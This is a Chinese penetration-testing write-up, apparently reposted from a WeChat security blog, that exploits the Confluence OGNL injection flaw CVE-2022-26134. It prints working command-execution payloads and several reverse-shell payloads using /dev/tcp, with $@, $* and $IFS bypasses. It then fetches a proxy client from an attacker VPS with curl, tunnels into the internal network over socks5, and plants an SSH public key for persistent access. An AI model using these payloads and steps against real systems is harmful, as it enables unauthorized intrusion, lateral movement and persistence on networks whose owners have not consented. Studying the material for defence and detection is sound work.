渗透实战|记一次RCE-内网之旅

admin 2023年3月13日18:09:04评论97 views字数 2328阅读7分45秒阅读模式

起因:Nuclei爆红,Atlassian Confluence的命令执行漏洞,编号:CVE-2022-26134渗透实战|记一次RCE-内网之旅

1.思路

命令执行-反弹shell失败-反弹shell成功-代理nps落地-内网之旅

2.命令执行

Nuclei已经给出了攻击载荷,而且把RCE之后的结果输出了

渗透实战|记一次RCE-内网之旅

payload解码看一下:

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

payload里,java.lang.Runtime类调用exec方法,执行whoami命令,在自定义的X-Cmd-Response响应头中输出命令执行的结果:

渗透实战|记一次RCE-内网之旅

自定义响应头,尝试执行其它命令:

渗透实战|记一次RCE-内网之旅

3.反弹shell(失败)

网上有不少反弹shell的攻击载荷

/${new javax.script.ScriptEngineManager().getEngineByName("nashorn").eval("new java.lang.ProcessBuilder().command('bash','-c','bash -i >& /dev/tcp/ip/port 0>&1').start()")}/

用网上公开的攻击载荷尝试反弹shell,发现nc监听一直没反应……

尝试寻找Confluence的其它版本反弹shell

渗透实战|记一次RCE-内网之旅

成功反弹

渗透实战|记一次RCE-内网之旅

怀疑是版本的问题导致无法反弹shell,可老表告诉我说是特殊字符的问题,于是找了一下java下命令执行的一些细节

java执行系统命令的代码:

  1. Runtime.getRuntime().exec()

  2. new ProcessBuilder().start()

第二种执行系统命令的实现代码已经尝试过了,换第一种Runtime反弹shell,也就是Nuclei已经给出的攻击载荷

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec("whoami").getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

这里需要注意的是,在使用Runtime执行命令的时候,会限制传入的参数,只能传入一个List对象或者数组,否则会导致命令执行不成功,反弹shell自然也会失败。

4.反弹shell(成功)

此时可以bypass让命令成功执行

1.$@bypass

$@能够获取对应的变量,比如:

/bin/bash -c  '$@|bash' xx echo id

这种方法可以成功执行id命令,$@获取 echo id然后通过管道符执行命令id,使用这种方式尝试反弹目标shell

攻击载荷:

/bin/bash -c $@|bash 0 echo 命令

于是$@bypass反弹shell的攻击载荷如下

${(#a=@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec('/bin/bash -c $@|bash 0 echo bash -i >&/dev/tcp/ip/6666 0>&1').getInputStream(),"utf-8")).(@com.opensymphony.webwork.ServletActionContext@getResponse().setHeader("X-Cmd-Response",#a))}

尝试反弹shell:

渗透实战|记一次RCE-内网之旅

反弹shell成功

渗透实战|记一次RCE-内网之旅

2.$*bypass

与上边同理

渗透实战|记一次RCE-内网之旅
渗透实战|记一次RCE-内网之旅

3.$IFSbypass

反弹shell命令的空格在bash中可以用$IFS替代

/bin/bash -c bash -i >&/dev/tcp/ip/8888 0>&1

使用$IFS替代空格:

/bin/bash -c bash$IFS-i$IFS>&/dev/tcp/ip/8888$IFS0>&1

尝试进行shell反弹

渗透实战|记一次RCE-内网之旅

成功反弹shell

渗透实战|记一次RCE-内网之旅

5.代理NPS落地

shell成功反弹,就要考虑进内网扫描一波了,一是上传扫描工具直接扫描,二是将流量代理出来,本地扫描一波

代理工具很多,各有优缺点,使用NPS进行内网穿透,NPC不需要配置,只需要文件落地即可

个人VPS有NPC端,目标主机有curl命令

渗透实战|记一次RCE-内网之旅

此时个人VPS开启python服务,目标主机用curl -O命令下载并保存npc端到本地

渗透实战|记一次RCE-内网之旅

开启python服务

python3版本:python3 -m http.server 8888

渗透实战|记一次RCE-内网之旅

目标主机进行下载:curl -O http://xxxx:8888/file

渗透实战|记一次RCE-内网之旅

解压并运行,服务端提前配置好

渗透实战|记一次RCE-内网之旅

运行./npc

渗透实战|记一次RCE-内网之旅

6.内网

可以看到客户端已经"上线"

渗透实战|记一次RCE-内网之旅
渗透实战|记一次RCE-内网之旅

Proxifier进行socks5代理即可

渗透实战|记一次RCE-内网之旅

配置firefox代理进入内网、k/fscan扫起来:

渗透实战|记一次RCE-内网之旅


再尝试echo >>追加进去公钥

渗透实战|记一次RCE-内网之旅

X-shell配置好之后

渗透实战|记一次RCE-内网之旅

追加公钥成功

渗透实战|记一次RCE-内网之旅

本地设置好socks5代理

渗透实战|记一次RCE-内网之旅

成功代理登陆:

渗透实战|记一次RCE-内网之旅
钟声敲响了日落
柏油路跃过山坡
一直通向北方的 使我们想象
长大后也未曾经过……


原文始发于微信公众号(藏剑安全):渗透实战|记一次RCE-内网之旅

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年3月13日18:09:04
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   渗透实战|记一次RCE-内网之旅https://cn-sec.com/archives/1601704.html

发表评论

匿名网友 填写信息